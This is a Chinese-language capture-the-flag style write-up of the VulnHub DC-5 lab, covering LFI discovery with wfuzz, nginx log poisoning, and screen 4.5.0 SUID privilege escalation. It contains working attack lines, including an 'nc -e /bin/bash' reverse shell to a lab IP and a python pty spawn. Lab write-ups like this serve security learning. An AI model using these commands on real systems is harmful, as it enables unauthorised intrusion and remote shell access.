vulnhub 之 dc 5

0x00  前言 

  我只能说万物都可fuzz,心细则挖天下。

0x01   流水

目标发现

netdiscover

 端口扫描

nmao -p- -A 192.168.5.58

 开了 80 60777 111

60777和111端口访问不了,不知道是干嘛用的,暂时放下不表

访问80端口再进行一个信息收集

1.cms 无

2.目录扫描

一个一个得去访问这些文件,菜能发现猫腻。ps:真的需要细心,当然我是喵wp知道得

所有文件基本都能从页面直接访问道,唯独footer.php很不一样,

 一个页脚文件,而且每次刷新年份都会变,那么前面得页脚会不会是包含这个文件来显示得呢?

查找每个文件,发现每个页脚都是固定得不会变,只有再留言提交后弹出得thankyou.php会跟着刷新而变动

 判断这里有一个包含,但是不知道现在这个包含是写死了的还是 通过变量传输,如果是通过变量传输得话就可能存在文件包含漏洞。这个时候,久去fuzz.

尝试下没用过得工具 wfuzz

wfuzz -w /root/dic/discovery/little_var.txt http://192.168.5.58/thankyou.php?FUZZ=index.php

找到了一个,去浏览器看一看

 果然是存在本地包含漏洞 (LFI)

接下来用文件包含去读一读文件

 用字典扫一扫linux文件,比较尴尬字典不够全,没有扫出来日志文件,又跑去看wp

nginx得日志文件

他将我们得访问记录记录再日志里了,这样我们写入一句话通过文件包含去执行就可以getshell了

写一句话

 之后用蚁剑连接虚拟终端反弹一个shell,并用python开启一个shell

kali   nc  -lnvp  4444

蚁剑  nc -e /bin/bash 192.168.5.54 4444

python -c 'import pty;pty.spawn("/bin/bash")'

 

 接下来提权,suid提权

查看可行得suid命令

 可以看到有screen 4.5.0   ,从漏洞库看有没有可用脚本

 耶!正好又有两个,拷到root目录然后拿到物理机通过蚁剑传到靶机 /tmp目录

直接拷过去没有运行权限

 打开这个shell,跟着他得步骤来

 跟着他上面得命令和步骤跟着输入,先编译两个文件

编译好后上传到靶机,然后跟着poc里面得步骤一步一步得再靶机输入命令就好

 拿到最终flag

0x02 学到得东西

1.suid提权

 参考:https://cloud.tencent.com/developer/article/1600994

原文地址:https://www.cnblogs.com/tlbjiayou/p/13131684.html